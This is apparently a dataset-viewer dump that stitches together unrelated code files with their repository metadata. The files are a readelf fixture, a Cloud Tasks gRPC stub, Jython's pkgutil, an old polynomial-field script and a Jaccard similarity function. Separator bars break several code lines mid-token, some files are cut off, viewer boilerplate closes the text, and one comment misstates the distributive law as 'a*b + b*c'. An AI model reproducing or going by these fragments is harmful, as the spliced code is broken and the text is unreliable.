[36] .ARM.attributes ARM_ATTRIBUTES 00000000 22700cb4 00003c 00 0 0 1
[37] .symtab SYMTAB 00000000 22700cf0 105ef20 10 38 901679 4
[38] .strtab STRTAB 00000000 234c4950 213a4fe 00 0 0 1
[39] .shstrtab STRTAB 00000000 257b46da 0001b4 00 0 0 1
Key to Flags:
W (write), A (alloc), X (execute), M (merge), S (strings)
I (info), L (link order), G (group), T (TLS), E (exclude), x (unknown)
O (extra OS processing required) o (OS specific), p (processor specific)
"""
_NOTES = """
Displaying notes found at file offset 0x00000168 with length 0x00000024:
Owner Data size\tDescription
GNU 0x00000014\tNT_GNU_BUILD_ID (unique build ID bitstring)
Build ID: WhatAnAmazingBuildId
Displaying notes found at file offset 0x226c41e8 with length 0x0000001c:
Owner Data size\tDescription
GNU 0x00000009\tNT_GNU_GOLD_VERSION (gold version)
"""
_OBJECT_OUTPUTS = {
'obj/third_party/icu/icuuc/ucnv_ext.o': """\
There are 71 section headers, starting at offset 0x3114:
Section Headers:
[Nr] Name Type Addr Off Size ES Flg Lk Inf Al
[ 0] NULL 00000000 000000 000000 00 0 0 0
[ 1] .strtab STRTAB 00000000 0029ac 000765 00 0 0 1
[ 2] .text PROGBITS 00000000 000034 000000 00 AX 0 0 4
[ 3] .text.ucnv_extIni PROGBITS 00000000 000034 0000c6 00 AX 0 0 2
[ 4] .rel.text.ucnv_ex REL 00000000 0023f4 000010 08 70 3 4
[ 5] .ARM.exidx.text.u ARM_EXIDX 00000000 0000fc 000008 00 AL 3 0 4
[60] .rodata.str1.1 PROGBITS 00000000 000015 000015 01 AMS 0 0 1
[56] .debug_str PROGBITS 00000000 000c50 0003c5 01 MS 0 0 1
[57] .debug_abbrev PROGBITS 00000000 001015 0000a1 00 0 0 1
[58] .debug_info PROGBITS 00000000 0010b6 000151 00 0 0 1
[59] .rel.debug_info REL 00000000 002544 0001e8 08 70 58 4
[60] .debug_ranges PROGBITS 00000000 001207 0000b0 00 0 0 1
[61] .rel.debug_ranges REL 00000000 00272c 000130 08 70 60 4
[62] .debug_macinfo PROGBITS 00000000 0012b7 000001 00 0 0 1
[63] .comment PROGBITS 00000000 0012b8 000024 01 MS 0 0 1
[64] .note.GNU-stack PROGBITS 00000000 0012dc 000000 00 0 0 1
[65] .ARM.attributes ARM_ATTRIBUTES 00000000 0012dc 00003c 00 0 0 1
[66] .debug_frame PROGBITS 00000000 001318 0001e4 00 0 0 4
[67] .rel.debug_frame REL 00000000 00285c 0000e0 08 70 66 4
[68] .debug_line PROGBITS 00000000 0014fc 000965 00 0 0 1
[69] .rel.debug_line REL 00000000 00293c 000070 08 70 68 4
[70] .symtab SYMTAB 00000000 001e64 000590 10 1 74 4
Key to Flags:
W (write), A (alloc), X (execute), M (merge), S (strings)
I (info), L (link order), G (group), T (TLS), E (exclude), x (unknown)
O (extra OS processing required) o (OS specific), p (processor specific)
""",
'obj/third_party/WebKit.a': """\
File: obj/third_party/WebKit.a(PaintChunker.o)
There are 68 section headers, starting at offset 0x5650:
Section Headers:
[Nr] Name Type Addr Off Size ES Flg Lk Inf Al
[ 0] NULL 00000000 000000 000000 00 0 0 0
Key to Flags:
W (write), A (alloc), X (execute), M (merge), S (strings)
I (info), L (link order), G (group), T (TLS), E (exclude), x (unknown)
O (extra OS processing required) o (OS specific), p (processor specific)
File: obj/third_party/WebKit.a(ContiguousContainer.o)
There are 68 section headers, starting at offset 0x5650:
Section Headers:
[Nr] Name Type Addr Off Size ES Flg Lk Inf Al
[ 0] NULL 00000000 000000 000000 00 0 0 0
Key to Flags:
W (write), A (alloc), X (execute), M (merge), S (strings)
I (info), L (link order), G (group), T (TLS), E (exclude), x (unknown)
O (extra OS processing required) o (OS specific), p (processor specific)
""",
'obj/base/base/page_allocator.o': """\
There are 68 section headers, starting at offset 0x5650:
Section Headers:
[Nr] Name Type Addr Off Size ES Flg Lk Inf Al
[ 0] NULL 00000000 000000 000000 00 0 0 0
[ 1] .rodata.str1.1 PROGBITS 00000000 000015 000005 01 AMS 0 0 1
""",
'obj/third_party/ffmpeg/libffmpeg_internal.a': """\
File: obj/third_party/ffmpeg/libffmpeg_internal.a(fft_float.o)
There are 68 section heade
|
tseaver/google-cloud-python
|
tasks/google/cloud/tasks_v2beta2/proto/cloudtasks_pb2_grpc.py
|
Python
|
apache-2.0
| 29,408
| 0.00374
|
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
from google.cloud.tasks_v2beta2.proto import (
cloudtasks_pb2 as google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_cloudtasks__pb2,
)
from google.cloud.tasks_v2beta2.proto import (
queue_pb2 as google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_queue__pb2,
)
from google.cloud.tasks_v2beta2.proto import (
task_pb2 as google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_task__pb2,
)
from google.iam.v1 import iam_policy_pb2 as google_dot_iam_dot_v1_dot_iam__policy__pb2
from google.iam.v1 import policy_pb2 as google_dot_iam_dot_v1_dot_policy__pb2
from google.protobuf import empty_pb2 as google_dot_protobuf_dot_empty__pb2
class CloudTasksStub(object):
"""Cloud Tasks allows developers to manage the execution of background
work in their applications.
"""
def __init__(
|
self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.ListQueues = channel.unary_unary(
"/google.cloud.tasks.v2beta2.CloudTasks/ListQueues",
request_serializer=google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_cloudtasks__pb2.ListQueuesRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_cloudtasks__pb2.ListQueuesResponse.FromString,
)
|
self.GetQueue = channel.unary_unary(
"/google.cloud.tasks.v2beta2.CloudTasks/GetQueue",
request_serializer=google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_cloudtasks__pb2.GetQueueRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_queue__pb2.Queue.FromString,
)
self.CreateQueue = channel.unary_unary(
"/google.cloud.tasks.v2beta2.CloudTasks/CreateQueue",
request_serializer=google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_cloudtasks__pb2.CreateQueueRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_queue__pb2.Queue.FromString,
)
self.UpdateQueue = channel.unary_unary(
"/google.cloud.tasks.v2beta2.CloudTasks/UpdateQueue",
request_serializer=google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_cloudtasks__pb2.UpdateQueueRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_queue__pb2.Queue.FromString,
)
self.DeleteQueue = channel.unary_unary(
"/google.cloud.tasks.v2beta2.CloudTasks/DeleteQueue",
request_serializer=google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_cloudtasks__pb2.DeleteQueueRequest.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.PurgeQueue = channel.unary_unary(
"/google.cloud.tasks.v2beta2.CloudTasks/PurgeQueue",
request_serializer=google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_cloudtasks__pb2.PurgeQueueRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_queue__pb2.Queue.FromString,
)
self.PauseQueue = channel.unary_unary(
"/google.cloud.tasks.v2beta2.CloudTasks/PauseQueue",
request_serializer=google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_cloudtasks__pb2.PauseQueueRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_queue__pb2.Queue.FromString,
)
self.ResumeQueue = channel.unary_unary(
"/google.cloud.tasks.v2beta2.CloudTasks/ResumeQueue",
request_serializer=google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_cloudtasks__pb2.ResumeQueueRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_queue__pb2.Queue.FromString,
)
self.GetIamPolicy = channel.unary_unary(
"/google.cloud.tasks.v2beta2.CloudTasks/GetIamPolicy",
request_serializer=google_dot_iam_dot_v1_dot_iam__policy__pb2.GetIamPolicyRequest.SerializeToString,
response_deserializer=google_dot_iam_dot_v1_dot_policy__pb2.Policy.FromString,
)
self.SetIamPolicy = channel.unary_unary(
"/google.cloud.tasks.v2beta2.CloudTasks/SetIamPolicy",
request_serializer=google_dot_iam_dot_v1_dot_iam__policy__pb2.SetIamPolicyRequest.SerializeToString,
response_deserializer=google_dot_iam_dot_v1_dot_policy__pb2.Policy.FromString,
)
self.TestIamPermissions = channel.unary_unary(
"/google.cloud.tasks.v2beta2.CloudTasks/TestIamPermissions",
request_serializer=google_dot_iam_dot_v1_dot_iam__policy__pb2.TestIamPermissionsRequest.SerializeToString,
response_deserializer=google_dot_iam_dot_v1_dot_iam__policy__pb2.TestIamPermissionsResponse.FromString,
)
self.ListTasks = channel.unary_unary(
"/google.cloud.tasks.v2beta2.CloudTasks/ListTasks",
request_serializer=google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_cloudtasks__pb2.ListTasksRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_cloudtasks__pb2.ListTasksResponse.FromString,
)
self.GetTask = channel.unary_unary(
"/google.cloud.tasks.v2beta2.CloudTasks/GetTask",
request_serializer=google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_cloudtasks__pb2.GetTaskRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_task__pb2.Task.FromString,
)
self.CreateTask = channel.unary_unary(
"/google.cloud.tasks.v2beta2.CloudTasks/CreateTask",
request_serializer=google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_cloudtasks__pb2.CreateTaskRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_task__pb2.Task.FromString,
)
self.DeleteTask = channel.unary_unary(
"/google.cloud.tasks.v2beta2.CloudTasks/DeleteTask",
request_serializer=google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_cloudtasks__pb2.DeleteTaskRequest.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.LeaseTasks = channel.unary_unary(
"/google.cloud.tasks.v2beta2.CloudTasks/LeaseTasks",
request_serializer=google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_cloudtasks__pb2.LeaseTasksRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_cloudtasks__pb2.LeaseTasksResponse.FromString,
)
self.AcknowledgeTask = channel.unary_unary(
"/google.cloud.tasks.v2beta2.CloudTasks/AcknowledgeTask",
request_serializer=google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_cloudtasks__pb2.AcknowledgeTaskRequest.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.RenewLease = channel.unary_unary(
"/google.cloud.tasks.v2beta2.CloudTasks/RenewLease",
request_serializer=google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_cloudtasks__pb2.RenewLeaseRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_task__pb2.Task.FromString,
)
self.CancelLease = channel.unary_unary(
"/google.cloud.tasks.v2beta2.CloudTasks/CancelLease",
request_serializer=google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_cloudtasks__pb2.CancelLeaseRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_task__pb2.Task.FromString,
)
self.RunTask = channel.unary_unary(
"/google.cloud.tasks.v2beta2.CloudTasks/RunTask",
request_serializer=google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_cloudtasks__pb2.RunTaskRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_tasks
|
zephyrplugins/zephyr
|
zephyr.plugin.jython/jython2.5.2rc3/Lib/pkgutil.py
|
Python
|
epl-1.0
| 19,027
| 0.001314
|
"""Utilities to support packages."""
# NOTE: This module must remain compatible with Python 2.3, as it is shared
# by setuptools for distribution with Python 2.3 and up.
import os
import sys
import imp
import os.path
from types import ModuleType
from org.python.core import imp as _imp, BytecodeLoader
__all__ = [
'get_importer', 'iter_importers', 'get_loader', 'find_loader',
'walk_packages', 'iter_modules',
'ImpImporter', 'ImpLoader', 'read_code', 'extend_path',
]
# equivalent to CPythonLib's pkgutil.read_code except that we need
# diff args to pass into our underlying imp implementation, as
# accessed by _imp here
def read_jython_code(fullname, file, filename):
data = _imp.readCode(filename, file, False)
return BytecodeLoader.makeCode(fullname + "$py", data, filename)
def simplegeneric(func):
"""Make a trivial single-dispatch generic function"""
registry = {}
def wrapper(*args, **kw):
ob = args[0]
try:
cls = ob.__class__
except AttributeError:
cls = type(ob)
try:
mro = cls.__mro__
except AttributeError:
try:
class cls(cls, object):
pass
mro = cls.__mro__[1:]
except TypeError:
mro = object, # must be an ExtensionClass or some such :(
for t in mro:
if t in registry:
return registry[t](*args, **kw)
else:
return func(*args, **kw)
try:
wrapper.__name__ = func.__name__
except (TypeError, AttributeError):
pass # Python 2.3 doesn't allow functions to be renamed
def register(typ, func=None):
if func is None:
return lambda f: register(typ, f)
registry[typ] = func
return func
wrapper.__dict__ = func.__dict__
wrapper.__doc__ = func.__doc__
wrapper.register = register
return wrapper
def walk_packages(path=None, prefix='', onerror=None):
"""Yields (module_loader, name, ispkg) for all modules recursively
on path, or, if path is None, all accessible modules.
'path' should be either None or a list of paths to look for
modules in.
'prefix' is a string to output on the front of every module name
on output.
Note that this function must import all *packages* (NOT all
modules!) on the given path, in order to access the __path__
attribute to find submodules.
'onerror' is a function which gets called with one argument (the
name of the package which was being imported) if any exception
occurs while trying to import a package. If no onerror function is
supplied, ImportErrors are caught and ignored, while all other
exceptions are propagated, terminating the search.
Examples:
# list all modules python can access
walk_packages()
# list all submodules of ctypes
walk_packages(ctypes.__path__, ctypes.__name__+'.')
"""
def seen(p, m={}):
if p in m:
return True
m[p] = True
for importer, name, ispkg in iter_modules(path, prefix):
yield importer, name, ispkg
if ispkg:
try:
__import__(name)
except ImportError:
if onerror is not None:
|
onerror(name)
except Exception:
if onerror is not None:
onerror(name)
|
else:
raise
else:
path = getattr(sys.modules[name], '__path__', None) or []
# don't traverse path items we've seen before
path = [p for p in path if not seen(p)]
for item in walk_packages(path, name+'.', onerror):
yield item
def iter_modules(path=None, prefix=''):
"""Yields (module_loader, name, ispkg) for all submodules on path,
or, if path is None, all top-level modules on sys.path.
'path' should be either None or a list of paths to look for
modules in.
'prefix' is a string to output on the front of every module name
on output.
"""
if path is None:
importers = iter_importers()
else:
importers = map(get_importer, path)
yielded = {}
for i in importers:
for name, ispkg in iter_importer_modules(i, prefix):
if name not in yielded:
yielded[name] = 1
yield i, name, ispkg
#@simplegeneric
def iter_importer_modules(importer, prefix=''):
if not hasattr(importer, 'iter_modules'):
return []
return importer.iter_modules(prefix)
iter_importer_modules = simplegeneric(iter_importer_modules)
class ImpImporter:
"""PEP 302 Importer that wraps Python's "classic" import algorithm
ImpImporter(dirname) produces a PEP 302 importer that searches that
directory. ImpImporter(None) produces a PEP 302 importer that searches
the current sys.path, plus any modules that are frozen or built-in.
Note that ImpImporter does not currently support being used by placement
on sys.meta_path.
"""
def __init__(self, path=None):
self.path = path
def find_module(self, fullname, path=None):
# Note: we ignore 'path' argument since it is only used via meta_path
subname = fullname.split(".")[-1]
if subname != fullname and self.path is None:
return None
if self.path is None:
path = None
else:
path = [os.path.realpath(self.path)]
try:
file, filename, etc = imp.find_module(subname, path)
except ImportError:
return None
return ImpLoader(fullname, file, filename, etc)
def iter_modules(self, prefix=''):
if self.path is None or not os.path.isdir(self.path):
return
yielded = {}
import inspect
filenames = os.listdir(self.path)
filenames.sort() # handle packages before same-named modules
for fn in filenames:
modname = inspect.getmodulename(fn)
if modname=='__init__' or modname in yielded:
continue
path = os.path.join(self.path, fn)
ispkg = False
if not modname and os.path.isdir(path) and '.' not in fn:
modname = fn
for fn in os.listdir(path):
subname = inspect.getmodulename(fn)
if subname=='__init__':
ispkg = True
break
else:
continue # not a package
if modname and '.' not in modname:
yielded[modname] = 1
yield prefix + modname, ispkg
class ImpLoader:
"""PEP 302 Loader that wraps Python's "classic" import algorithm
"""
code = source = None
def __init__(self, fullname, file, filename, etc):
self.file = file
self.filename = filename
self.fullname = fullname
self.etc = etc
def load_module(self, fullname):
self._reopen()
try:
mod = imp.load_module(fullname, self.file, self.filename, self.etc)
finally:
if self.file:
self.file.close()
# Note: we don't set __loader__ because we want the module to look
# normal; i.e. this is just a wrapper for standard import machinery
return mod
def get_data(self, pathname):
f = open(pathname, "rb")
try:
return f.read()
finally:
f.close()
def _reopen(self):
if self.file and self.file.closed:
mod_type = self.etc[2]
if mod_type==imp.PY_SOURCE:
self.file = open(self.filename, 'rU')
elif mod_type in (imp.PY_COMPILED, imp.C_EXTENSION):
self.file = open(self.filename, 'rb')
def _fix_name(self, fullname):
if fullname is None:
fullname = self.fullname
elif fullname != self.fullname:
raise ImportError("Loader for module %s cannot handle "
"module %s" % (self.fullname
|
xbmc/atv2
|
xbmc/lib/libPython/Python/Lib/lib-old/zmod.py
|
Python
|
gpl-2.0
| 2,363
| 0.007194
|
# module 'zmod'
# Compute properties of mathematical "fields" formed by taking
# Z/n (the whole numbers modulo some whole number n) and an
# irreducible polynomial (i.e., a polynomial with only complex zeros),
# e.g., Z/5 and X**2 + 2.
#
# The field is formed by taking all possible linear combinations of
# a set of d base vectors (where d is the degree of the polynomial).
#
# Note that this procedure doesn't yield a field for all combinations
# of n and p: it may well be that some numbers have more than one
# inverse and others have none. This is what we check.
#
# Remember that a field is a ring where each element has an inverse.
# A ring has commutative addition and multiplication, a zero and a one:
# 0*x = x*0 = 0, 0+x = x+0 = x, 1*x = x*1 = x. Also, the distributive
# property holds: a*(b+c) = a*b + b*c.
# (XXX I forget if this is an axiom or follows from the rules.)
import poly
# Example N and polynomial
N = 5
P = poly.plus(poly.one(0, 2), poly.one(2, 1)) # 2 + x**2
# Return x modulo y. Returns >= 0 even if x < 0.
def mod(x, y):
return divmod(x, y)[1]
# Normalize a polynomial modulo n and modulo p.
def norm(a, n, p):
a = poly.modulo(a, p)
a = a[:]
for i in range(len(a)): a[i] = mod(a[i], n)
a = poly.normalize(a)
return a
# Make a list of all n^d elements of the proposed field.
def make_all(mat):
all = []
for row in mat:
for a in row:
all.append(a)
return all
def make_elements(n, d):
if d == 0: return [poly.one(0, 0)]
sub = make_elements(n, d-1)
all = []
for a in sub:
for i in range(n):
all.append(poly.plus(a, poly.one(d-1, i)))
return all
def make_inv(all, n, p):
x = poly.one(1, 1)
inv = []
for a in all:
inv.append(norm(poly.times(a, x), n, p))
return inv
def checkfield(n, p):
all = make_elements(n, len(p)-1)
inv = make_inv(all, n, p)
all1 = all[:]
inv1 = inv[:]
all1.sort()
inv1.sort()
if all1 == inv1: print 'BINGO!'
else:
print 'Sorry:', n, p
print all
print inv
def rj(s, width):
if type(s) is not type(''): s = `s`
n = len(s)
if n >= width: return s
|
return ' '*(width - n) + s
def lj(s, width):
if type(s) is not type(''): s = `s`
n = len(s)
if n >= width: return s
|
return s + ' '*(width - n)
|
TheAlgorithms/Python
|
maths/jaccard_similarity.py
|
Python
|
mit
| 2,365
| 0
|
"""
The Jaccard similarity coefficient is a commonly used indicator of the
similarity between two sets. Let U be a set and A and B be subsets of U,
then the Jaccard index/similarity is defined to be the ratio of the number
of elements of their intersection and the number of elements of their union.
Inspired from Wikipedia and
the book Mining of Massive Datasets [MMDS 2nd Edition, Chapter 3]
https://en.wikipedia.org/wiki/Jaccard_index
https://mmds.org
Jaccard similarity is widely used with MinHashing.
"""
def jaccard_similariy(setA, setB, alternativeUnion=False):
"""
Finds the jaccard similarity between two sets.
Essentially, its intersection over union.
The alternative way to calculate this is to take union as sum of the
number of items in the two sets. This will lead to jaccard similarity
of a set with itself be 1/2 instead of 1. [MMDS 2nd Edition, Page 77]
Parameters:
:setA (set,list,tuple): A non-empty set/list
:setB (set,list,tuple): A non-empty set/list
:alternativeUnion (boolean): If True, use sum of number of
items as union
Output:
(float) The jaccard similarity between the two sets.
Examples:
>>> setA = {'a', 'b', 'c', 'd', 'e'}
>>> setB = {'c', 'd', 'e', 'f', 'h', 'i'}
>>> jaccard_similariy(setA,setB)
0.375
>>> jaccard_similariy(setA,setA)
1.0
>>> jaccard_similariy(setA,setA,T
|
rue)
0.5
>>> setA = ['a', 'b', 'c', 'd', 'e']
>>> setB = ('c', 'd', 'e', 'f', 'h', 'i')
>>> jaccard_similariy(setA,setB)
0.375
"""
if isinstance(setA, set) and isinstance(setB, set):
intersection = len(setA.intersection(setB))
|
if alternativeUnion:
union = len(setA) + len(setB)
else:
union = len(setA.union(setB))
return intersection / union
if isinstance(setA, (list, tuple)) and isinstance(setB, (list, tuple)):
intersection = [element for element in setA if element in setB]
if alternativeUnion:
union = len(setA) + len(setB)
else:
union = setA + [element for element in setB if element not in setA]
return len(intersection) / len(union)
if __name__ == "__main__":
setA = {"a", "b", "c", "d", "e"}
setB = {"c", "d", "e", "f", "h", "i"}
print(jaccard_similariy(setA, setB))
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.